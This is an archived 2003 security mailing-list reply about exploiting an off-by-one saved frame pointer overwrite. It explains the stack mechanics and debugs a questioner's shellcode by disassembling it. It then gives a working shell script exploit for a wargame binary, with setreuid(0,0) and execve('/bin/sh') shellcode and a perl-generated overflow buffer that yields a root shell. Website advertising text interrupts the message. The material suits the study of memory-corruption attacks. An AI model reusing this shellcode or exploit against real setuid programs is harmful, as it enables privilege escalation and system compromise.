Re: Frame Pointer Overwriting

On Fri, May 23, 2003 at 10:24:59AM -0700, mike cramp wrote:
> Hey guys,

Well, what exactly is happening when you overwrite the least significant byte of the saved frame pointer on a little-endian arch? If you actually thought about it, it would be obvious. main()'s stack frame will be shifted "backwards" (if X > Y) with X-Y bytes where X is the original LSB of main()'s frame pointer and Y is the overflow-byte.

Y = 0 will obviously shift the frame with the largest value possible, minimum 0 (if X = 0x00) and max 255 (if X = 0xff). Using Y = 0 will thus maximize the chances of hitting the buffer, as long as X-Y > the distance between main()'s stackframe and the buffer in bob().

> Now since I am researching a remote frame pointer overwrite, I need to

To begin with, that shellcode looks pretty weird.

[je@vudo ~]$ cat>shellcode.c<<EOF
char main[] = "\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\xe3\x52\x53\x89\xe1\xcd\x80"; EOF
[je@vudo ~]$ gcc -o shellcode shellcode.c [je@vudo ~]$ ./shellcode
Segmentation fault (core dumped)
[je@vudo ~]$ objdump -D shellcode 2>&1 | sed -n '/<main>/,/\t\.\.\./p' 08049390 <main>:

 8049390:       6a 0b                   push   $0xb
 8049392:       58                      pop    %eax
 8049393:       99                      cltd   
 8049394:       52                      push   %edx
 8049395:       68 6e 2f 73 68          push   $0x68732f6e
 804939a:       68 2f 2f 62 69          push   $0x69622f2f
 804939f:       e3 52                   jecxz  80493f3 <_DYNAMIC+0x47>
 80493a1:       53                      push   %ebx
 80493a2:       89 e1                   mov    %esp,%ecx
 80493a4:       cd 80                   int    $0x80
        ...

Do you need help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

Oops, that doesn't look like valid shellcode, does it? What is that jecxz supposed to do there...? But, if we insert a \x89 right before the \xe3, it should work. Then the jecxz 80493f3 turns into a mov %esp,%ebx followed by a push %edx, which will serve your purposes better.

Btw, since the address of buffer is printed to stdout, why don't you use it? Here's an ugly exploit for it where the program is first run to find out the address of the buffer. You'll have to enter the addr yourself, since the address is printed to the buffered stdout and it will coredump before the output is flushed if we pipe it to for instance 'sed'. Of course, this can be worked around, but why bother..

cat > vuln6-xpl.sh << 'EOF'

#!/bin/sh
#
# Linux/x86 exploit for vuln_6 @ dtors.net
#
# 2003-05-24 - Joel Eriksson (je at 0xbadc0ded.org)
#

[ $# -gt 1 ] && prog=$1 || prog=./6

shellcode=`

        # setreuid(0, 0)
        printf "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80"
        # execve("/bin/sh", "/bin/sh", NULL)
        printf "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
        printf "\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"

$prog `perl -e 'print "A"x256'`
echo -n "buffer is at? "
read addr
exec $prog `perl -e '

        my $s = '"'$shellcode'"' . ("A" x (4 - length('"'$shellcode'"') % 4));
        print $s . (pack("L", '$addr') x ((256 - length($s)) / 4));

-- 
Joel Eriksson 
-------------------------------------------------
Cellphone: +46-70-288 64 16 Home: +46-26-10 23 37
Security Research & Systems Development at Bitnux
PGP Key Server pgp.mit.edu, PGP Key ID 0x529FDBD1
A615 A1E1 3CA2 D7C2 CFEA 47B4 7EF7 E6B2 529F DBD1
-------------------------------------------------